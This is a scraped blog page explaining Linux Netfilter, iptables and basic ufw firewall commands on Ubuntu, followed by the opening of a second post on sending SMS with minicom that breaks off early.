<span style="font-family: Arial, Helvetica, sans-serif;">The Linux kernel includes the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Netfilter</span> subsystem, which is used to manipulate or decide the fate of network traffic headed into or through your server. All modern Linux firewall solutions use this system for packet filtering.</span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;">The kernel's packet filtering system would be of little use to administrators without a userspace interface to manage it. This is the purpose of iptables. When a packet reaches your server, it will be handed off to the Netfilter subsystem for acceptance, manipulation, or rejection based on the rules supplied to it from userspace via iptables. Thus, iptables is all you need to manage your firewall if you're familiar with it, but many frontends are available to simplify the task.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1CLDvFDGklWS13IQ8yzJ5b7oqYMKSv1hPwNtB6fQ2Ag0bHMGg87bQRljMyvR4j8JPqGxBVpyeMvvAzGaAFMR6v5rb_2UEgzf1pNogJoD8cjMl0aS6b8-GPQCXr26ZHGS59GRZaMqnc4eX/s1600/firewall-psd_35-53626.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1CLDvFDGklWS13IQ8yzJ5b7oqYMKSv1hPwNtB6fQ2Ag0bHMGg87bQRljMyvR4j8JPqGxBVpyeMvvAzGaAFMR6v5rb_2UEgzf1pNogJoD8cjMl0aS6b8-GPQCXr26ZHGS59GRZaMqnc4eX/s1600/firewall-psd_35-53626.jpg" height="318" width="400" /></span></a></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>ufw - Uncomplicated Firewall</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">The default firewall configuration tool for Ubuntu is ufw. Developed to ease iptables firewall configuration, ufw provides a user friendly way to create an IPv4 or IPv6 host-based firewall.</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">ufw by default is initially disabled. From the ufw man page:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">“ ufw is not intended to provide complete firewall functionality via its command interface, but instead provides an easy way to add or remove simple rules. It is currently mainly used for host-based firewalls. ”</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">The following are some examples of how to use ufw:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">First, ufw needs to be enabled. From a terminal prompt enter:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw enable</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To open a port (ssh in this example):</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw allow 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Rules can also be added using a numbered format:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw insert 1 allow 80</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Similarly, to close an opened port:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw deny 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To remove a rule, use delete followed by the rule:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw delete deny 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">It is also possible to allow access from specific hosts or networks to a port. The following example allows ssh access from host 192.168.0.2 to any ip address on this host:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw allow proto tcp from 192.168.0.2 to any port 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Replace 192.168.0.2 with 192.168.0.0/24 to allow ssh access from the entire subnet.</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Adding the --dry-run option to a ufw command will output the resulting rules, but not apply them. For example, the following is what would be applied if opening the HTTP port:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b> sudo ufw --dry-run allow http</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">*filter</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-input - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-output - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-forward - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-limit - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-limit-accept - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">### RULES ###</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-input -p tcp --dport 80 -j ACCEPT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">### END RULES ###</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-input -j RETURN</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-output -j RETURN</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-forward -j RETURN</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-limit -m limit --limit 3/minute -j LOG --log-prefix "[UFW LIMIT]: "</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-limit -j REJECT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-limit-accept -j ACCEPT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">COMMIT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Rules updated</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">ufw can be disabled by:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw disable</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To see the firewall status, enter:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw status</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">And for more verbose status information use:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw status verbose</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To view the numbered format:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw status numbered</b></span></span></div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com1tag:blogger.com,1999:blog-6934113520237822184.post-48468436478845553562012-12-28T14:32:00.003-08:002012-12-28T14:35:07.541-08:00AT-Commands <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial I will walk through the steps of sending and receiving text message (SMS) from your Ubuntu laptop using a package called minicom. We also need a modem which dials into the telco provider. For this I use a USB Wifi modem.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBOKGitY0gbbrJs1v-t3XTYTIIGnWTdA31ZEpC9u4lwTEWghWZJsT7FfNFTYEDhNcOkjI8CRwwuEobu00IP0zv0_pEwc2wyYVvUvs8Pi7U5ilrodhELOV8Jg9gdUrZsU7xDA_Uk7Zbvh5/s1600/minicom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBOKGitY0gbbrJs1v-t3XTYTIIGnWTdA31ZEpC9u4lwTEWghWZJsT7FfNFTYEDhNcOkjI8CRwwuEobu00IP0zv0_pEwc2wyYVvUvs8Pi7U5ilrodhELOV8Jg9gdUrZsU7xDA_Uk7Zbvh5/s1600/minicom.png" height="198" width="400" /></a></div>
<br />
<br />
Firstly connect the USB Wifi modem to a USB port of your laptop or PC. Fire up your mnicom program. If it was not installed, you can easily do so by typing:<br />
<br />
<b>#apt-get install minicom</b><br />
<br />
To launch minicom, type:<br />
<br />
